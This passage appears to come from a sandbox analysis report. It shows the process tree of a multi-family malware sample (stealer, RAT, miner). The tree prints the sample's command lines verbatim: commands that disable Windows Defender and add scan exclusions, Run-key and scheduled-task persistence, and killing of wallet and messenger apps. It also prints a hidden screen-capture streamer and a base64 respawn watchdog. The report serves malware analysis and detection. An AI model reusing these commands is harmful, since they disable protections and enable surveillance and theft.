                                  • Hide Artifacts: Ignore Process Interrupts
                                  PID:4360
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$env:TEMP' -ErrorAction SilentlyContinue"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2312
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$env:APPDATA' -ErrorAction SilentlyContinue""
                                  3⤵
                                  • Prevents Microsoft Defender from scanning certain paths by adding an exclusion.
                                  • Hide Artifacts: Hidden Window
                                  • Hide Artifacts: Ignore Process Interrupts
                                  PID:4172
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$env:APPDATA' -ErrorAction SilentlyContinue"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4672
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -Command "(Get-MpPreference).DisableRealtimeMonitoring""
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:4148
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -NoProfile -Command "(Get-MpPreference).DisableRealtimeMonitoring"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3448
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience""
                                  3⤵
                                  • Hide Artifacts: Hidden Files and Directories
                                  PID:3760
                                  • C:\Windows\system32\attrib.exe
                                    attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience"
                                    4⤵
                                    • Views/modifies file attributes
                                    PID:1136
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe'""
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:4740
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe'; Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe'"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2012
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ShellExperienceHost" /t REG_SZ /d ""C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe"" /f"
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:4988
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ShellExperienceHost" /t REG_SZ /d ""C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe"" /f
                                    4⤵
                                    • Adds Run key to start application
                                    PID:3340
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ShellExperienceHost" /t REG_SZ /d ""C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe"" /f"
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:4584
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ShellExperienceHost" /t REG_SZ /d ""C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe"" /f
                                    4⤵
                                    • Adds Run key to start application
                                    PID:1500
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Steam.exe /F"
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:3132
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /IM Steam.exe /F
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1776
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F"
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:1264
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /IM javaw.exe /F
                                    4⤵
                                    • Kills process with taskkill
                                    PID:4416
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Exodus.exe /F"
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:2976
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /IM Exodus.exe /F
                                    4⤵
                                    • Kills process with taskkill
                                    PID:5536
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $bounds = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds; $bitmap = New-Object System.Drawing.Bitmap $bounds.Width, $bounds.Height; $graphics = [System.Drawing.Graphics]::FromImage($bitmap); $graphics.CopyFromScreen($bounds.X, $bounds.Y, 0, 0, $bounds.Size); $memoryStream = New-Object System.IO.MemoryStream; $bitmap.Save($memoryStream, [System.Drawing.Imaging.ImageFormat]::Png); $bytes = $memoryStream.ToArray(); [System.Console]::OpenStandardOutput().Write($bytes, 0, $bytes.Length); $bitmap.Dispose(); $graphics.Dispose(); $memoryStream.Dispose();""
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:2516
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $bounds = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds; $bitmap = New-Object System.Drawing.Bitmap $bounds.Width, $bounds.Height; $graphics = [System.Drawing.Graphics]::FromImage($bitmap); $graphics.CopyFromScreen($bounds.X, $bounds.Y, 0, 0, $bounds.Size); $memoryStream = New-Object System.IO.MemoryStream; $bitmap.Save($memoryStream, [System.Drawing.Imaging.ImageFormat]::Png); $bytes = $memoryStream.ToArray(); [System.Console]::OpenStandardOutput().Write($bytes, 0, $bytes.Length); $bitmap.Dispose(); $graphics.Dispose(); $memoryStream.Dispose();"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4388
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "tasklist /FO CSV /NH"
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:1984
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist /FO CSV /NH
                                    4⤵
                                    • Discovers running processes
                                    PID:2780
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Telegram.exe /F"
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:3012
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill /IM Telegram.exe /F
                                    4⤵
                                    • Kills process with taskkill
                                    PID:6040
                            • C:\Windows\system32\wscript.exe
                              wscript.exe
                              1⤵
                                PID:5360
                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe
                                C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe
                                1⤵
                                • Executes dropped EXE
                                PID:6016
                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe
                                  C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe C:\snapshot\lofy\_monkey_b8dd4dbe.js
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks processor information in registry
                                  PID:4312
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /d /s /c ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -Name W -Namespace N -MemberDefinition "[DllImport(\"kernel32.dll\")]public static extern IntPtr GetConsoleWindow();[DllImport(\"kernel32.dll\")]public static extern bool FreeConsole();[DllImport(\"kernel32.dll\")]public static extern bool AttachConsole(uint p);[DllImport(\"user32.dll\")]public static extern bool ShowWindow(IntPtr h,int s);";[N.W]::ShowWindow([N.W]::GetConsoleWindow(),0);[N.W]::FreeConsole();""
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:2580
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -Name W -Namespace N -MemberDefinition "[DllImport(\"kernel32.dll\")]public static extern IntPtr GetConsoleWindow();[DllImport(\"kernel32.dll\")]public static extern bool FreeConsole();[DllImport(\"kernel32.dll\")]public static extern bool AttachConsole(uint p);[DllImport(\"user32.dll\")]public static extern bool ShowWindow(IntPtr h,int s);";[N.W]::ShowWindow([N.W]::GetConsoleWindow(),0);[N.W]::FreeConsole();"
                                      4⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1108
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /d /s /c "net session"
                                    3⤵
                                    • Executes a command shell one-liner
                                    PID:2152
                                    • C:\Windows\system32\net.exe
                                      net session
                                      4⤵
                                        PID:4948
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 session
                                          5⤵
                                            PID:244
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /d /s /c "attrib +h +s "C:\ProgramData\Microsoft\Windows\ServiceProfiles\e2592e74d051""
                                        3⤵
                                        • Hide Artifacts: Hidden Files and Directories
                                        PID:1784
                                        • C:\Windows\system32\attrib.exe
                                          attrib +h +s "C:\ProgramData\Microsoft\Windows\ServiceProfiles\e2592e74d051"
                                          4⤵
                                          • Views/modifies file attributes
                                          PID:6060
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /d /s /c "attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\e2592e74d051""
                                        3⤵
                                        • Hide Artifacts: Hidden Files and Directories
                                        PID:4288
                                        • C:\Windows\system32\attrib.exe
                                          attrib +h +s "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\e2592e74d051"
                                          4⤵
                                          • Views/modifies file attributes
                                          PID:1376
                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe
                                        C:\Users\Admin\AppData\Local\Microsoft\Windows\ShellExperience\2026-08-24_d72cac618cdc5222f55e5f6515340dd9_blankgrabber_coinminer_glassworm_icedid_luca-stealer_njrat_stealc_zxxz.exe -e "eval(Buffer.from(\"CmNvbnN0IGNwPXJlcXVpcmUoJ2NoaWxkX3Byb2Nlc3MnKSxmcz1yZXF1aXJlKCdmcycpOwpjb25zdCBwaWQ9NDMxMjsKY29uc3QgaXNDb21waWxlZD10cnVlOwpjb25zdCBvcmlnRXhlPSJDOlxcVXNlcnNcXEFkbWluXFxBcHBEYXRhXFxMb2NhbFxcTWljcm9zb2Z0XFxXaW5kb3dzXFxTaGVsbEV4cGVyaWVuY2VcXDIwMjYtMDgtMjRfZDcyY2FjNjE4Y2RjNTIyMmY1NWU1ZjY1MTUzNDBkZDlfYmxhbmtncmFiYmVyX2NvaW5taW5lcl9nbGFzc3dvcm1faWNlZGlkX2x1Y2Etc3RlYWxlcl9uanJhdF9zdGVhbGNfenh4ei5leGUiOwpjb25zdCBvcmlnU2NyaXB0PSJDOlxcc25hcHNob3RcXGxvZnlcXF9tb25rZXlfYjhkZDRkYmUuanMiOwpjb25zdCBvcmlnTk09IkM6XFxzbmFwc2hvdFxcbG9meVxcbm9kZV9tb2R1bGVzIjsKY29uc3QgYmtFeGU9IkM6XFxQcm9ncmFtRGF0YVxcTWljcm9zb2Z0XFxXaW5kb3dzXFxTZXJ2aWNlUHJvZmlsZXNcXGUyNTkyZTc0ZDA1MVxcMjAyNi0wOC0yNF9kNzJjYWM2MThjZGM1MjIyZjU1ZTVmNjUxNTM0MGRkOV9ibGFua2dyYWJiZXJfY29pbm1pbmVyX2dsYXNzd29ybV9pY2VkaWRfbHVjYS1zdGVhbGVyX25qcmF0X3N0ZWFsY196eHh6LmV4ZSI7CmNvbnN0IGJrU2NyaXB0PSIiOwpjb25zdCBia05NPSIiOwpzZXRJbnRlcnZhbCgoKT0+ewogIGxldCBhbGl2ZT1mYWxzZTsKICB0cnl7cHJvY2Vzcy5raWxsKHBpZCwwKTthbGl2ZT10cnVlO31jYXRjaChlKXt9CiAgaWYoIWFsaXZlKXsKICAgIGNvbnN0IGVudj1PYmplY3QuYXNzaWduKHt9LHByb2Nlc3MuZW52LHtfTllYX0hJRERFTjonMSd9KTsKICAgIGlmKGlzQ29tcGlsZWQpewogICAgICBsZXQgcnVuRXhlPW9yaWdFeGU7CiAgICAgIGlmKCFmcy5leGlzdHNTeW5jKG9yaWdFeGUpKXsKICAgICAgICBpZihia0V4ZSYmZnMuZXhpc3RzU3luYyhia0V4ZSkpcnVuRXhlPWJrRXhlOwogICAgICAgIGVsc2UgcHJvY2Vzcy5leGl0KCk7CiAgICAgIH0KICAgICAgY3Auc3Bhd24ocnVuRXhlLFtdLHtkZXRhY2hlZDp0cnVlLHN0ZGlvOidpZ25vcmUnLHdpbmRvd3NIaWRlOnRydWUsZW52fSkudW5yZWYoKTsKICAgIH1lbHNlewogICAgICBsZXQgcnVuU2NyaXB0PW9yaWdTY3JpcHQsbnA9b3JpZ05NOwogICAgICBpZighZnMuZXhpc3RzU3luYyhvcmlnU2NyaXB0KSl7CiAgICAgICAgaWYoZnMuZXhpc3RzU3luYyhia1NjcmlwdCkpe3J1blNjcmlwdD1ia1NjcmlwdDtucD1ia05NO30KICAgICAgICBlbHNlIHByb2Nlc3MuZXhpdCgpOwogICAgICB9CiAgICAgIGlmKG5wKWVudi5OT0RFX1BBVEg9bnA7CiAgICAgIGNwLnNwYXduKHByb2Nlc3MuZXhlY1BhdGgsW3J1blNjcmlwdF0se2RldGFjaGVkOnRydWUsc3RkaW86J2lnbm9yZScsd2luZG93c0hpZGU6dHJ1ZSxlbnZ9KS51bnJlZigpOwogICAgfQogICAgcHJvY2Vzcy5leGl0KCk7CiAgfQp9LDMwMDApOw==\",\"base64\").toString())"
                                        3⤵
                                        • Executes dropped EXE
                                        PID:2132
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /d /s /c "net session"
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:4400
                                        • C:\Windows\system32\net.exe
                                          net session
                                          4⤵
                                            PID:2468
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 session
                                              5⤵
                                                PID:4156
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /d /s /c "schtasks /Delete /TN "WindowsSystemUpdateSvc" /F"
                                            3⤵
                                            • Indicator Removal: Clear Persistence
                                            PID:5604
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /Delete /TN "WindowsSystemUpdateSvc" /F
                                              4⤵
                                                PID:3092
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /d /s /c "schtasks /Delete /TN "ScreenLiveClient" /F"
                                              3⤵
                                              • Indicator Removal: Clear Persistence
                                              PID:3084
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /Delete /TN "ScreenLiveClient" /F
                                                4⤵
                                                  PID:4744
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /d /s /c "schtasks /Create /TN "ScreenLiveClient" /TR "wscript.exe \"C:\Users\Admin\AppData\Local\Temp\svchost.vbs\"" /SC ONLOGON /RL HIGHEST /F"
                                                3⤵
                                                • Executes a command shell one-liner
                                                PID:5520
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Create /TN "ScreenLiveClient" /TR "wscript.exe \"C:\Users\Admin\AppData\Local\Temp\svchost.vbs\"" /SC ONLOGON /RL HIGHEST /F
                                                  4⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:4604
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /d /s /c "net session"
                                                3⤵
                                                • Executes a command shell one-liner
                                                PID:1140
                                                • C:\Windows\system32\net.exe
                                                  net session
                                                  4⤵
                                                    PID:5464
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 session
                                                      5⤵
                                                        PID:4316
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /d /s /c "net session"
                                                    3⤵
                                                    • Executes a command shell one-liner
                                                    PID:5948
                                                    • C:\Windows\system32\net.exe
                                                      net session
                                                      4⤵
                                                        PID:1524
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 session
                                                          5⤵
                                                            PID:5216
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell.exe -NoProfile -NoLogo -ExecutionPolicy Bypass -Command " Add-Type -AssemblyName System.Drawing Add-Type -AssemblyName System.Windows.Forms $dR = [System.Drawing.Bitmap].Assembly.Location $wR = [System.Windows.Forms.Screen].Assembly.Location Add-Type -ReferencedAssemblies $dR,$wR -TypeDefinition @\" using System; using System.Drawing; using System.Drawing.Imaging; using System.IO; using System.Threading; using System.Windows.Forms; public class SS { static int cm = 0; static bool go = true; public static void Run(int mw, int q, int fps) { try { System.Diagnostics.Process.GetCurrentProcess().PriorityClass = System.Diagnostics.ProcessPriorityClass.BelowNormal; } catch {} var sc = Screen.AllScreens; for (int i = 0; i < sc.Length; i++) { var s = sc[i]; Console.Error.WriteLine(\"MON:\" + i + \"|\" + s.Bounds.Width + \"x\" + s.Bounds.Height + \"|\" + (s.Primary ? \"P\" : \"S\")); } Console.Error.WriteLine(\"READY\"); var th = new Thread(() => { try { var si = Console.OpenStandardInput(); while (go) { int b = si.ReadByte(); if (b == -1) { go = false; break; } if (b >= 0 && b < Screen.AllScreens.Length) cm = b; } } catch {} }); th.IsBackground = true; th.Start(); ImageCodecInfo jc = null; foreach (var c in ImageCodecInfo.GetImageEncoders()) if (c.MimeType == \"image/jpeg\") { jc = c; break; } var ep = new EncoderParameters(1); ep.Param[0] = new EncoderParameter(System.Drawing.Imaging.Encoder.Quality, (long)q); int d = 1000 / fps; Stream so = Console.OpenStandardOutput(); Bitmap cb = null; Graphics cg = null; Bitmap ob = null; Graphics og = null; int lm = -1; try { while (go) { long t = Environment.TickCount; int m = cm; var ss = Screen.AllScreens; if (m >= ss.Length) m = 0; var bn = ss[m].Bounds; if (m != lm || cb == null) { if (cg != null) cg.Dispose(); if (cb != null) cb.Dispose(); if (og != null) og.Dispose(); if (ob != null) ob.Dispose(); cb = new Bitmap(bn.Width, bn.Height, PixelFormat.Format32bppRgb); cg = Graphics.FromImage(cb); float ra = Math.Min(1.0f, (float)mw / bn.Width); if (ra < 1.0f) { int ow = (int)(bn.Width * ra), oh = (int)(bn.Height * ra); ob = new Bitmap(ow, oh, PixelFormat.Format32bppRgb); og = Graphics.FromImage(ob); og.InterpolationMode = System.Drawing.Drawing2D.InterpolationMode.Bilinear; og.CompositingQuality = System.Drawing.Drawing2D.CompositingQuality.HighSpeed; } else { ob = null; og = null; } lm = m; } cg.CopyFromScreen(bn.X, bn.Y, 0, 0, new Size(bn.Width, bn.Height), CopyPixelOperation.SourceCopy); Bitmap tgt; if (ob != null && og != null) { og.DrawImage(cb, 0, 0, ob.Width, ob.Height); tgt = ob; } else tgt = cb; using (var ms = new MemoryStream()) { if (jc != null) tgt.Save(ms, jc, ep); else tgt.Save(ms, ImageFormat.Jpeg); byte[] jpg = ms.ToArray(); byte[] ln = BitConverter.GetBytes(jpg.Length); so.Write(ln, 0, 4); so.Write(jpg, 0, jpg.Length); so.Flush(); } long el = Environment.TickCount - t; int w = (int)(d - el); if (w > 0) Thread.Sleep(w); } } finally { if (cg != null) cg.Dispose(); if (cb != null) cb.Dispose(); if (og != null) og.Dispose(); if (ob != null) ob.Dispose(); } } } \"@ [SS]::Run(960, 40, 12) "
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3348
                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kxq55h1h\kxq55h1h.cmdline"
                                                          4⤵
                                                            PID:1044
                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6EED.tmp" "c:\Users\Admin\AppData\Local\Temp\kxq55h1h\CSC33CC698D334A368FE1C886A1124F3.TMP"
                                                              5⤵
                                                                PID:1164
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo //B "C:\Users\Admin\AppData\Local\Temp\system_check_1787614506771.vbs""
                                                            3⤵
                                                            • Executes a command shell one-liner
                                                            PID:5432
                                                            • C:\Windows\system32\cscript.exe
                                                              cscript //nologo //B "C:\Users\Admin\AppData\Local\Temp\system_check_1787614506771.vbs"
                                                              4⤵
                                                              • Executes a VBScript file via the Windows Script Host.
                                                              PID:484
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 4 /f"
                                                            3⤵
                                                            • Executes a command shell one-liner
                                                            PID:4600
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 4 /f
                                                              4⤵
                                                                PID:5620
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f"
                                                              3⤵
                                                              • Executes a command shell one-liner
                                                              PID:924
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
                                                                4⤵
                                                                  PID:3788
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                3⤵
                                                                • Executes a command shell one-liner
                                                                PID:1848
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                  4⤵
                                                                  • Modifies Windows Defender DisableAntiSpyware settings
                                                                  PID:5548
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f"
                                                                3⤵
                                                                • Executes a command shell one-liner
                                                                PID:2368
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
                                                                  4⤵
                                                                    PID:2484
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"
                                                                  3⤵
                                                                  • Executes a command shell one-liner
                                                                  PID:5056
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                                                    4⤵
                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                    PID:3964
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
                                                                  3⤵
                                                                  • Executes a command shell one-liner
                                                                  PID:5696
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
                                                                    4⤵
                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                    PID:4508
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"
                                                                  3⤵
                                                                  • Executes a command shell one-liner
                                                                  PID:5836
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
                                                                    4⤵
                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                    PID:3704
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"
                                                                  3⤵
                                                                  • Executes a command shell one-liner
                                                                  PID:108
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
                                                                    4⤵
                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                    PID:4064
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f"
                                                                  3⤵
                                                                  • Executes a command shell one-liner
                                                                  PID:3024
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
                                                                    4⤵
                                                                      PID:244
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"
                                                                    3⤵
